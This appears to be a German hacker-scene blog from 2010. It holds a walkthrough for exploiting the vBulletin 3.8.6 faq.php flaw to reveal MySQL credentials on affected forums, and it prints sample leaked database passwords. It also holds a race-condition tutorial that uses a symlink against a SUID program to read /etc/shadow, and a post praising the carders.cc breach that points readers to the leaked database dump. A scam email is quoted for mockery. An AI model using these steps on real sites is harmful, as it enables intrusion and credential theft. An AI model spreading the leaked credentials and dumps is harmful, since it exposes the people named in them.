vBulletin® 3.8.6 faq.php Vulnerability

Ist vllt schon dem ein oder anderen bekannt, aber ich find das echt interessant, dass einer großen und maechtigen Forensoftware wie vBulletin der Fehler unterlaufen kann, dass die MySQL Zugangsdaten fuer jede beliebige Person sichtbar werden kann.

Die Luecke wurde heute nachmittag veroeffentlicht und vBulletin reagierte mit einem Patch darauf.

Die faq.php wurde nur indirekt davon betroffen und dient eher als “Ausgabe”, da ein Fehler in den phrases dafuer verantwortlich war.

Wo befindet sich die Luecke?

Schauen wir uns mal die /install/vbulletin-language-de-du.xml Datei an und suchen nach “database_ingo” – was finden wir? Ah, interessant:

config['Database']['dbname']}
Datenbank-Server: {$vbulletin->config['MasterServer']['servername']}
Datenbank-Port: {$vbulletin->config['MasterServer']['port']}
Datenbank-Benutzername: {$vbulletin->config['MasterServer']['username']}
Datenbank-Kennwort: {$vbulletin->config['MasterServer']['password']}]]>

Es werden uns also unsere MySQL Datenbank Daten ausgegeben.

In der englischen Version sieht das ganze aehnlich aus /install/vbulletin-language.xml line 3701:

config['Database']['dbname']}
Database Host: {$vbulletin->config['MasterServer']['servername']}
Database Port: {$vbulletin->config['MasterServer']['port']}
Database Username: {$vbulletin->config['MasterServer']['username']}
Database Password: {$vbulletin->config['MasterServer']['password']}]]>

Wie nutze ich das nun aus?
Wir suchen uns ein Forum, welches von dieser Luecke betroffen ist, klicken oben auf “Hilfe”/”FAQ”, geben bei “Suchbegriffe” bzw. “Search Word(s):” dann “Datenbank” (bzw. database) ein und sehen dann, aha, erster Treffer:

Datenbank-Name: vbulletin
Datenbank-Server: localhost
Datenbank-Port: 3306
Datenbank-Benutzername: root
Datenbank-Kennwort: my4moo

Bzw. auf nem englischen Board:

Database Name: pro_astrogaming_com
Database Host: localhost
Database Port: 3306
Database Username: pro_astrogaming
Database Password: gitl0st

Screenshot

Auf das, was man damit anfangen kann, brauche ich denk ich nicht weiter drauf eingehen.

Wie schuetze ich mich davor?
Wie oben bereits gepostet durch einen Patch von der offiziellen vBulletin Seite, oder durch ein MySQL Query:

DELETE FROM `vb_phrase` WHERE `varname`='database_ingo'

Soviel dazu erstmal, wuensch euch noch eine schoene Woche 🙂

Tote Links entfernt und bald back :>

Nabend,

ihr glaubt gar nicht wie schnell einige Projekte “spurlos verschwinden” oder einfach down sind und bleiben. Hab letztens meine Linkliste links durchforscht und entdeckt das gut jeder 4te Link nicht mehr funktionsfaehig war – schade eigentlich.

Was gibts noch aktuelles zu berichten? Naja, komm grad leider nicht zum Bloggen, daher hat GregorSamsa den letzten fuer mich erstellt (Dankeschoen nochmal 😉 ) da mein Laptop nun auch seit fast nem Monat einen defekten Bildschirm besitzt.

Ein neuer wird im Laufe der Woche bestellt und dann werd ich dort sicherlich viel Spaß & Zeit zum Bloggen finden und Dinge durchsetzen koennen, welche seit Monaten geplant waren 😉

Soviel dazu erstmal, ich lebe noch 😀

[Tut] Simple Race Conditions

So, auf Wunsch von p0nny hier mal ein Blogeintrag von mir.

Ich dachte, ich mache einfach mal ein kleines Paper zu einfachen Race Conditions,

vielleicht interessiert es ja jemanden…

/***************************
*                            *
*   Simple Race Conditions   *
*                            *
*   written by GregorSamsa   *
* [email protected] *
*                            *
*****************************/

0x01 {
 Ein kleines Vorwort:
 Hier mal ein kleines Paper zum Thema Race Conditions.
 Wieder eines der Paper die geschrieben wurden,
 um Anfängern das Leben zu erleichter ;)

 Naja, nichts besonderes, aber vllt. regt es den ein oder
 anderen zum nachdenken an...
}

0x02 {
 Was sind Race Conditions?
 Race Conditions sind Situationen, in denen es darum geht,
 dass die Programmausführung von einem Programm solange braucht,
 dass der Angreifer oder ein zweites Programm diese Zeit ausnutzen
 kann, um den Ablauf des ersten Programmes zu ändern.

 Ich habe hierfür ein kleines C-Programm geschrieben, dass
 diesen Umstand simuliert.
}

0x03 {
 /** Simple Race Condition - Example **/
 #include <stdio.h>

 int main(int argc, char **argv)
 {
 FILE *f;
 char c;

 if(argc < 2) {
 printf("usage: %s <filename>\n", argv[0]);
 return 1;
 }

 if(strcmp(argv[1], "secretfilename") == 0) {
 printf("filename correct\nreading %s\n", argv[1]);
 }
 else {
 printf("wrong filename\npls w8 4 next try...\n");
 remove(argv[1]);
 sleep(5);
 }

 f = fopen(argv[1], "r");
 if(f == NULL) {
 printf("cannot open file...\nmaybe wrong filename...?\n");
 return 1;
 }

 while(!feof(f)) printf("%c", fgetc(f));

 fclose(f);

 return 0;
 }
}

0x04 {
 Überlegungen:
 Schauen wir uns dieses Programm an:
 Als erstes überprüft es den Dateinamen.
 Wir gehen einfach mal davon aus, dass wir
 "secretfilename" nicht aus dem Speicher lesen
 können. Das könnte ja auch eine sha-1 Prüfsumme
 des Dateinamens sein ;)

 Wenn der Dateiname nicht richtig ist, wird die Datei
 gelöscht und es werden 5 Sekunden gewartet.

 Später wird versucht die Datei zu öffnen und zu lesen.
 Wenn der falsche Dateiname eingegeben wurde,
 ist die Datei gelöscht und kann nicht gelesen werden...
 Oder doch...?
}

0x05 {
 Angriff:
 Da wir secretfilename nicht wissen, probieren wir
 einfach mal so, das Programm zu starten:

 [[email protected] ~]$ ./rc
 usage: ./rc <filename>
 [[email protected] ~]$ ./rc test
 wrong filename
 pls w8 4 next try...
 <5 sek warten>
 cannot open file...
 maybe wrong filename...?

 Die Angriffsmöglichkeit besteht in der Wartezeit
 von 5 Sekunden.
 Die Datei wird erst gelöscht, _danach_ wird gewartet
 und dann versucht die Datei zu öffnen.
 Daher haben wir ganz locker Zeit, in diesen 5 Sekunden
 die Datei neu zu erstellen, damit die Ausgelesen wird:
 (In dem Beispiel gehen wir davon aus, dass wir ein
 SUID root Programm haben und /etc/shadow lesen wollen)

 [[email protected] ~]$ ./rc test &    # im Hintergrund starten
 [1] 1337
 [[email protected] ~]$ wrong filename
 pls w8 4 next try

 [[email protected] ~]$ ln -s /etc/shadow test    # während der 5 Sekunden eine Datei anlegen,
die auf /etc/shadow verweist
 [[email protected] ~]$ <inhalt von /etc/shadow>
 [1]+ Fertig            ./rc test
 [[email protected] ~]$

 Ganz einfach, oder? :P
 Selbst wenn "test" besteht, wird diese Datei gelöscht,
 da der Dateiname falsch ist.
 Allerdings wird erst _danach_ 5 sek. gewartet,
 und wir erstellen in der Zeit eine Verknüpfung zu /etc/shadow,
 die dann von dem Programm ausgelesen wird. Easy, aren't it?
}

0x06 {
 Schlusswort:
 Das war kein Übermäßiges Tut und in ~45 min. geschrieben.
 Aber vllt. hilft es euch, Designfehler bei Programmabläufen
 zu verstehen und auszunutzen.

 Wer noch Fragen hat findet mich da:
 [email protected]
 irc.freenode.net #back2hack  http://back2hack.cc/
 irc.ircdotnet.net #free-hack  http://free-hack.com/
}

0x07 {
 oh shit, da greetz section... but meh like mah
 1337 friendz so meh hav 2 greetz them here!!!111
 J0hn.X3r - 4 u ;)
 BlackBerry - meh like u :-*
 h0yt3r - caaatz meow <3333
 Invisibility, Cheese, 0x30, aKiller - only: <3
 OpCodez - drugs r bad, but u r cool :P
 ...and kazuya, RedTiger, soulstoned, gesocks and teh
 other user from #back2hack and #free-hack i like u
}

/** n0p **/

Carders.cc owned and exp0sed

                                                      |\___/|
              -=[ISSUE - NO 1]=-                     =) ^Y^ (=
                   -=[OF]=-                           \  ^  /
                                                       )=*=(
 ______________________________ __ ____________ _     /     \
|.-----.--.--.--.-----.-----.--|  |   ___ ___ _| ||   |     |
||  _  |  |  |  |     |  -__|  _  |  | . |   | . ||  /| | | |\
||_____|________|__|__|_____|_____|  |__,|_|_|___||  \| | |_|/\
|  | |                                   ______   |__//_// ___/ __ 
|  | |               .-----.--.--.-----.|      |.-----.--\_).--|  ||
|  | |               |  -__|_   _|  _  ||  ||  ||__ --|  -__|  _  ||
|  | |               |_____|__.__|   __||  ||  ||_____|_____|_____||
|_/   \__________________________|__|___|  ||  |___________________|
                                        |______|
         FEATURING             ~~~ |\                  A present
  Germanys next Darkmarket    ~~~ /()/              brought to you                                
         Carders.cc            ~~~`\|            by some happy ninjas

Dieser Text war am 19.05.2010 auf verschiedene Foren zu lesen und auch Seiten wie heise.de berichteten drueber.

Wer den vollstaendigen Inhalt sehen mag:

*klick*

Sieht ganz gut gemacht aus 😉

Solche Leute verdienen respekt und nicht welche, die sich ein iPhone gecardet haben oder CCs verkaufen.

Doch war sowas zu erwarten?

Meiner Meinung nach aufjedenfall ja. Entweder ein Bust oder eben sowas.. Sie bekamen in letzter Zeit sowieso “zu viel Aufmerksamkeit” durch die Medien und Co – ARD und ZDF berichteten teilweise etwas ueber carders.cc und in der “scene” ist carders.cc zwar teilweise “beliebt”, was dark market angeht, doch von “richtigen” Leuten, die ihre Faehigkeiten woanders haben, wurde carders schon immer abgelehnt.

Stimme auch BuntspechT seiner Aussage zu:

Nun hoffe ich doch mal auf angemessene rechtliche Konsequenzen für die Betreiber und finanziellen Unterstützer!

Aus http://buntspecht.us/2010/05/19/carders-cc-exposed/

Noch am gleichen Tag veroeffentlichten die Betreiber auf twitter ein kleines Statement dazu:

http://twitter.com/carders_cc/status/14261947002

Liebe User,
Wie ihr wohl schon alle mitbekommen habt, wurde Carders Opfer einer Hackerattacke. Meiner Meinung nach ein dunkler Tag für die Szene, auch wenn sich jetzt viele schadensfroh im Keller einen ablachen. Leider wissen, oder verstehen diese Menschen nicht was für Konsequenzen so etwas haben kann.
Wie dem Deface-Text bereits zu entnehmen war, wurden einige IPs geloggt, dies jedoch nicht absichtlich sondern durch einen Fehler des (ehemaligen) Techmins Zagerus. An dieser Stelle ein großes Entschuldigung an die User, die vom IP Logging betroffen waren. Dieser Vorfall sollte euch jedoch daran erinnern, dass ihr immer mit einem VPN / Socks5 / VicSocks, wie auch immer, unterwegs sein solltet. Alle User sollten natürlich ihre Passwörter ihrer E-Mails, anderen Accounts, ICQ Nummern etc. ändern! Selbst wenn nun mit der gehackten Datenbank gegen uns ermittelt wird, was nach dem deutschen Gesetz eigentlich verboten sind, (aber die wahren Kriminellen sind ja ohnehin die Behörden) haben die größten Teil der User NICHTS zu befürchten. Von diesen Ermittlungen wird größtenteils das Team betroffen sein.

Nachdem KRON0S und ich uns einige Zeit unterhalten haben, ist uns klar geworden, dass wir uns die Tour von ein paar vorpubertären Hackerkindern die Stimmung nicht nehmen lassen (Es handlet sich hierbei btw. um die gleichen Hacker wie bei 1337-crew), und dass das nicht das Ende von Carders ist. Nein! Wir werden zurück kommen! Dies wird jedoch einige Tage in Anspruch nehmen, da wir 1. auf Heihachi umziehen 2. nach dem Hack verständlicherweise die Boardsoftware wechseln und 3. um zukünfige Hacks zu vermeiden, sehr viele Sicherheitstests durchführen werden. GGF. wird jedoch der Jabberserver schon früher laufen. Desweiteren wurde Zagerus nach der großen Panne bis auf weiteres suspendiert, und die Technik wurde einem erfahrenereren User übergeben. Wir sehen uns in einigen Tagen wieder!

THANAT0S im Namen der Administration

Aus http://nopaste.info/81779e1129_nl.html

Und spaeter hab ich einen Screenshot von einer eMail gefunden, welche ich euch nicht vorenthalten mag:

Ein Backup der MySQL Datenbank wurde auch veroeffentlicht, welches ihr u.a. hier bekommen koennt, da die ganzen filehoster mirrors doch recht fix am deleten sind – macht aber vllt bei dem ein oder anderen probleme (habs noch nicht versucht).

Wer sich das Backup nicht laden will/kann, sondern einfach so schaun mag, was da lief, dort ist es online und alle internen Sektionen einsehbar:

http://carders.1.vg/index.php

Aktuell kann man sagen, dass sie mit ihrer “Rueckkehr” schon gegen heut Abend oder morgen rechnen…

Back!

Lang ists her, da hab ich meinen letzten Blog eintrag gemacht.

Hab ne laengere Pause gemacht und mir ist einfach irgendwie so gut wie nix eingefallen, was ich bloggen koennte.

Dann war mein Blog nun gut ne Woche down/nicht erreichbar.. die Gruende koennts nochmal hier nachlesen:

Was ist vorgefallen?

Unser US Datacenter Dateiload/Thomsn LLC hat ohne vorankündigung den Betrieb eingestellt und somit waren alle US Server am Frietag den 14.5 offline.

Wir haben umgehend unseren Support Manager kontaktiert, dieser versicherte usn dass es sich um einen Hardwareschaden handelt der “in Kürze” behoben sein würde.

Der Vorgang zog sich in die Länge, man versicherte uns aber das Problem beheben zu können.

48 Stunden später haben wir keine Antwort mehr auf Anfragen bekommen.

Wir haben 24 Stunden gewartet (bis Montag) und dann angefangen Backupserver einzurichten.

Das Problem dabei ist das die “Hauptlast” der Kunden auf US Servern liegt und somit mehr als die Hälfte aller shared Webspace Kunden betroffen ist.

Im Moment scheint jedoch eigentlich alles wieder zu funktionieren.

Heute hab ich den letzten Schultag vor den Ferien und werde dann denk ich, mir Zeit finden die Sachen hier zu bloggen, welche ich mir vorgenommen habe.

Jetzt gleich kommt nochn kleiner extra Artikel ueber carders.cc, da die meisten denk ich wissen, was passiert ist und spaeter oder am Samstag kommt dann erstmal ne kleine Monatsuebersicht, was grob vorgefallen ist 🙂

Zum Schluss zeig ich euch noch meinen Gewinn, welchen ich per eMail erhalten habe:

von Captain Maxwell J. Daniels <[email protected]>
an [email protected]
Datum 7. Mai 2010 07:08
Betreff HALLO FREUND
Unterzeichnet von sbcglobal.net

Hallo mein Freund,
Ich hoffe, dass diese E-Mail genügt Ihnen gut, weil ich ein ehrlicher Geschäftsmann Vorschlag für Sie haben.
Ich bin Captain Maxwell J. Daniels Servieren mit USA Military Provincial Reconstruction Team in Camp Anaconda Balad und ich mit Ihnen Kontakt aufnehmen, um mich in eine sichere Aufbewahrung des Geldes Mission entdeckte ich in dem Haus eines verstorbenen Präsidenten Saddam Hussein Loyalisten während unserer letzten House zu unterstützen Haus vor einigen Tagen raid. Ich weiß wirklich nicht, wie viel in die Tasche enthalten, aber aus meiner eigenen Einschätzung ihrer über US $ 20.000.000,00 Dollar in bar (Real grünen Dollarscheine).
Wenn Sie interessiert sind, antworten Sie mir sofort, damit wir den Transfer Verfahren erörtern können.
[email protected]
Captain Maxwell J. Daniels

Dieses “Deutsch” gefaellt mir – mag jemand einen Anteil vom Geld? löl…